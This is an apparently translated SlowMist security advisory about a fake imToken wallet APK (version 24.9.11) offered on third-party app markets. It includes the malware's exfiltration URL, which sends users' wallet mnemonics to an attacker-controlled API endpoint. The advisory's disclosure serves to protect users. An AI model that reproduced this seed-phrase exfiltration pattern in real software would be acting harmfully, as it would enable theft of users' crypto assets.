background
background
Web3 based on blockchain technology is driving the next generation of technological revolution, and more and more people are beginning to participate in this wave of encryption, but Web3 and Web2 are two completely different worlds. The Web3 world is a dark forest full of various opportunities and dangers. In the Web3 world, the wallet is the entrance and pass to enter the Web3 world.
When you explore and experience many blockchain-related applications and websites in the Web3 world through your wallet, you will find that every application on a public chain uses a wallet to "log in"; this is different from our traditional "login" Login" is different, in the Web2 world, the accounts between each application are not all interoperable. But in the world of Web3, all applications use the wallet to "login" uniformly. We can see that "Login with Wallet" is not displayed when "logging in" to the wallet, but "Connect Wallet" is replaced. And the wallet is your only passport in the Web3 world.
As the saying goes, there must be shadows under the tall buildings. In such a hot Web3 world, wallets, as entry-level applications, are naturally targeted by the black and gray industry chain.
first level title
website analysis
In view of the many ways to download, let’s take apkcombo as an example today. Apkcombo is a third-party application market. According to the official statement, most of the applications it provides come from other official application stores, but is it true?
Let's first look at how big the traffic of apkcombo is:
According to statistics from the statistics site similarweb, the apkcombo site:
Global rank: 1,809
National rank: 7,370
Category ranking: 168
We can see that its influence and traffic are very large.
It provides a chrome APK download plug-in by default, and we found that the number of users of this plug-in reached 10 W+:
So back to the wallet direction in the Web3 field that we are concerned about, how safe is the wallet application that users download from here?
Let's take the well-known imToken wallet as an example. The official download path of Google Play is:
https://play.google.com/store/apps/details? id=im.token.app
Because many mobile phones do not support Google Play or because of network problems, many people will download Google Play applications from here.
The download path of the apkcombo mirror station is:
https://apkcombo.com/downloader/#package=im.token.app
From the picture above, we can see that the version provided by apkcombo is 24.9.11. After confirmation by imToken, this is a version that does not exist! It is confirmed that this is the version with the most fake imToken wallets currently on the market.
At the time of writing this article, the latest version of the imToken wallet is 2.11.3. The version number of this wallet is very high, and it is obviously set to pretend to be the latest version.
As shown in the picture below, we found on apkcombo that this fake wallet version shows a large download volume. The download volume here should be the download volume information crawled from Google Play. For security reasons, we feel it is necessary to disclose the source of this malicious app. Prevent more people from downloading this fake wallet.
At the same time, we found that there are similar download sites such as: uptodown
Download link: https://imtoken.br.uptodown.com/android
first level title
wallet analysis
We have analyzed many cases of fake wallets before, such as: 2021-11-24 We disclosed: "SlowMist: Fake wallet apps have caused tens of thousands of people to be stolen, with losses of up to 1.3 billion U.S. dollars", so I won't go into details here.
We only analyze the fake wallet with version 24.9.11 provided by apkcombo. When creating a wallet or importing a wallet mnemonic on the start interface, the fake wallet will send the mnemonic and other information to the server of the phishing website, as shown in the figure below :
According to the reverse APK code and the actual analysis of traffic packets, the mnemonic sending method is as follows:
https://api.funnel.rocks/api/trust?aid= 10&wt= 1&os= 1&key=<mnemonic>
Looking at the picture below, the earliest "api.funnel.rocks" certificate appeared on 2022-06-03, which is the approximate time when the attack started:
Summarize
Summarize
At present, this kind of scam activity is not only active, but even has a tendency to expand its scope, and new victims are deceived every day. As the weakest link in the security system, users should always remain skeptical and enhance security awareness and risk awareness. When you use wallets and exchanges, please look for the official download channel and verify it from multiple parties; if your wallet is from the above mirror Please transfer assets and uninstall the software as soon as possible, and verify through the official verification channel if necessary.
At the same time, if you need to use the wallet, please be sure to look for the following official websites of mainstream wallet apps:
1/imToken wallet:https://token.im/
2 /TokenPocket wallet:https://www.tokenpocket.pro/
3/TronLink Wallet:https://www.tronlink.org/
4/Bitpie Wallet:https://bitpie.com/
5/MetaMask Wallet:https://metamask.io/
6 /Trust Wallet:https://trustwallet.com/
Please continue to pay attention to the SlowMist security team, more Web3 security risk analysis and warnings are on the way.
Acknowledgments: Thanks to imToken for the verification support provided by the official during the traceability process.
Due to confidentiality and privacy, this article is just the tip of the iceberg. SlowMist here suggests that users need to strengthen their understanding of security knowledge, further strengthen their ability to identify phishing attacks, etc., to avoid encountering such attacks. For more safety knowledge, it is recommended to read Slow Mist's"Blockchain Dark Forest Self-Help Manual"。
